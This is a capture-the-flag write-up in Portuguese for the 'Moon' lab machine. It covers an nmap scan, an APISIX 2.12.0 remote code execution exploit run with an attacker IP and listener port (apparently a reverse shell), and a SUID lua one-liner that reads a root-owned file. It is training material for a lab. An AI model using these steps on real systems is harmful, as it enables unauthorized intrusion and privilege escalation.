- Published on
Moon Writeup
- Authors
- Name
- Gabriel Silva
- @gabriel-silva-509347165
Plataforma: Hacking Club
Dificuldade: Easy
Nome: Moon
nmap -sV -sC -p- -v $IP --open
Port Scanning
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c1:fe:c0:85:79:2c:77:d0:06:04:93:1e:b7:5b:55:df (RSA)
| 256 b4:96:88:93:3b:59:e2:ea:11:ae:c9:69:78:9c:a4:6c (ECDSA)
|_ 256 1e:75:3d:55:78:74:36:aa:d1:9e:94:09:70:f5:68:90 (ED25519)
2379/tcp open etcd-client?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:54 GMT
| Content-Length: 19
| page not found
| GetRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| Content-Length: 19
| page not found
| HTTPOptions:
| HTTP/1.0 200 OK
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Date: Fri, 19 Jul 2024 05:15:27 GMT
| Content-Length: 0
| docker:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
| rel="preload"
| href=
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:32 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
|_ rel="preload"
9000/tcp open tcpwrapped
9080/tcp open http OpenResty web app server
|_http-server-header: APISIX/2.12.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9081/tcp open http nginx 1.19.0
|_http-favicon: Unknown favicon MD5: EBC398A521A820550E20D38221AE717E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9082/tcp open http nginx 1.19.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: A60BE5F4B4EF66A4AF5000B66067DADE
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9090/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
| http-methods:
|_ Supported Methods: GET OPTIONS
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
9091/tcp open http OpenResty web app server
|_http-server-header: openresty
|_http-title: 404 Not Found
9443/tcp open ssl/tungsten-https?
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2379-TCP:V=7.94SVN%I=7%D=7/19%Time=6699F66E%P=x86_64-pc-linux-gnu%r
SF:(docker,A3,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request:\\x20missing\\x20required\\
SF:x20Host\\x20header\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nC
SF:onnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request:\\x20missing\\x20require
SF:d\\x20Host\\x20header")%r(GetRequest,152,"HTTP/1\\.0\\x20404\\x20Not\\x20Foun
SF:d\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20content-type,\\x20autho
SF:rization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x20GET,\\x20OPTIONS,\\
SF:x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x20\\*\\r\\nContent-Type
SF::\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x20nosniff
SF:\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:26\\x20GMT\\r\\nContent-Le
SF:ngth:\\x2019\\r\\n\\r\\n404\\x20page\\x20not\\x20found\\n")%r(HTTPOptions,ED,"HT
SF:TP/1\\.0\\x20200\\x20OK\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20con
SF:tent-type,\\x20authorization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x
SF:20GET,\\x20OPTIONS,\\x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x2
SF:0\\*\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:27\\x20GMT\\r\\nContent
SF:-Length:\\x200\\r\\n\\r\\n")%r(FourOhFourRequest,152,"HTTP/1\\.0\\x20404\\x20No
SF:t\\x20Found\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20content-type,
SF:\\x20authorization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x20GET,\\x20
SF:OPTIONS,\\x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x20\\*\\r\\nCon
SF:tent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x
SF:20nosniff\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:54\\x20GMT\\r\\nC
SF:ontent-Length:\\x2019\\r\\n\\r\\n404\\x20page\\x20not\\x20found\\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=7/19%Time=6699F66E%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x
SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba
SF:d\\x20Request")%r(GetRequest,2F98,"HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr
SF:ol:\\x20no-cache\\r\\nContent-Type:\\x20text/html;\\x20charset=UTF-8\\r\\nExpi
SF:res:\\x20-1\\r\\nPragma:\\x20no-cache\\r\\nX-Content-Type-Options:\\x20nosniff
SF:\\r\\nX-Xss-Protection:\\x201;\\x20mode=block\\r\\nDate:\\x20Fri,\\x2019\\x20Jul
SF:\\x202024\\x2005:15:26\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"
SF:en\\">\\n\\x20\\x20<head>\\n\\x20\\x20\\x20\\x20<script>\\n\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\n\\x20\\x20\\x20\\x20\\x20\\x20!\\(function\\(\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20if\\x20\\('PerformanceLongTaskTiming'\\x20in\\x20window\\)\\x20{\\n
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20var\\x20g\\x20=\\x20\\(window\\.__tt
SF:i\\x20=\\x20{\\x20e:\\x20\\[\\]\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20g\\.o\\x20=\\x20new\\x20PerformanceObserver\\(function\\(l\\)\\x20{\\n\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.e\\x20=\\x20g\\.e\\.concat\\(l\\
SF:.getEntries\\(\\)\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\);\\n\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.o\\.observe\\({\\x20entryTypes:\\x20\\
SF:['longtask'\\]\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\
SF:x20\\x20\\x20}\\)\\(\\);\\n\\n\\x20\\x20\\x20\\x20</script>\\n\\x20\\x20\\x20\\x20<meta
SF:\\x20charset=\\"utf-8\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA
SF:-Compatible\\"\\x20content=\\"IE=edge,chrome=1\\"\\x20/>\\n\\x20\\x20\\x20\\x20<m
SF:eta\\x20name=\\"viewport\\"\\x20content=\\"width=device-width\\"\\x20/>\\n\\x20\\
SF:x20\\x20\\x20<meta\\x20name=\\"theme-color\\"\\x20content=\\"#000\\"\\x20/>\\n\\n\\
SF:x20\\x20\\x20\\x20<title>Grafana</title>\\n\\n\\x20\\x20\\x20\\x20<base\\x20href=
SF:\\"/\\"\\x20/>\\n\\n\\x20\\x20\\x20\\x20<link\\n\\x20\\x20\\x20\\x20\\x20\\x20rel=\\"pre
SF:load\\"\\n\\x20\\x20\\x20\\x20\\x20\\x20href=")%r(Help,67,"HTTP/1\\.1\\x20400\\x20
SF:Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConn
SF:ection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(HTTPOptions,2F98,"HTT
SF:P/1\\.0\\x20404\\x20Not\\x20Found\\r\\nCache-Control:\\x20no-cache\\r\\nContent-
SF:Type:\\x20text/html;\\x20charset=UTF-8\\r\\nExpires:\\x20-1\\r\\nPragma:\\x20no
SF:-cache\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nX-Xss-Protection:\\x201;
SF:\\x20mode=block\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:32\\x20GMT
SF:\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en\\">\\n\\x20\\x20<head>\\n\\x20
SF:\\x20\\x20\\x20<script>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\\x20\\x20\\x20\\x20\\x2
SF:0!\\(function\\(\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20if\\x20\\('Perform
SF:anceLongTaskTiming'\\x20in\\x20window\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20var\\x20g\\x20=\\x20\\(window\\.__tti\\x20=\\x20{\\x20e:\\x20\\[\\]\\x
SF:20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.o\\x20=\\x20new\\x20Per
SF:formanceObserver\\(function\\(l\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20g\\.e\\x20=\\x20g\\.e\\.concat\\(l\\.getEntries\\(\\)\\);\\n\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20g\\.o\\.observe\\({\\x20entryTypes:\\x20\\['longtask'\\]\\x20}\\);\\n\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20}\\)\\(\\);\\n\\n\\x20
SF:\\x20\\x20\\x20</script>\\n\\x20\\x20\\x20\\x20<meta\\x20charset=\\"utf-8\\"\\x20/>
SF:\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA-Compatible\\"\\x20content=\\"
SF:IE=edge,chrome=1\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20name=\\"viewport\\"\\x2
SF:0content=\\"width=device-width\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20name=\\"
SF:theme-color\\"\\x20content=\\"#000\\"\\x20/>\\n\\n\\x20\\x20\\x20\\x20<title>Grafa
SF:na</title>\\n\\n\\x20\\x20\\x20\\x20<base\\x20href=\\"/\\"\\x20/>\\n\\n\\x20\\x20\\x20
SF:\\x20<link\\n\\x20\\x20\\x20\\x20\\x20\\x20rel=\\"preload\\"\\n\\x20\\x20\\x20\\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap encontrou as portas 22(SSH), 2379, 3000, 9000, 9080(HTTP), 9081(HTTP), 9091(HTTP) e 9443(HTTPS) abertas.
Enumeration
Pra deixar a writeup mais curta a gente vai direto pra porta que interessa, que é a 9080 (APISIX).
O Apache APISIX é um gateway de API de alto desempenho, dinâmico e em tempo real. Ele oferece recursos avançados de gerenciamento de tráfego, como balanceamento de carga, upstream dinâmico, lançamento canário, interrupção de circuito, autenticação etc.
Podemos verificar a versão do APISIX fazendo um banner grabbing com o curl (nmap encontrou a versão também).
curl -I http://172.16.4.86:9080 
Essa versão APISIX/2.12.0 é vulnerável a RCE (Remote Code Execution).
searchsploit APISIX 
Foot Hold
python3 50829.py <http://172.16.4.89:9080/> 10.0.31.150 1337 
"Privillege Escalation"
SUID /usr/bin/lua
find / -perm -u=s -type f 2>/dev/null 
https://gtfobins.github.io/gtfobins/lua/#suid
lua -e 'local f=io.open("/root/root.txt", "rb"); print(f:read("*a")); io.close(f);' 
Proof
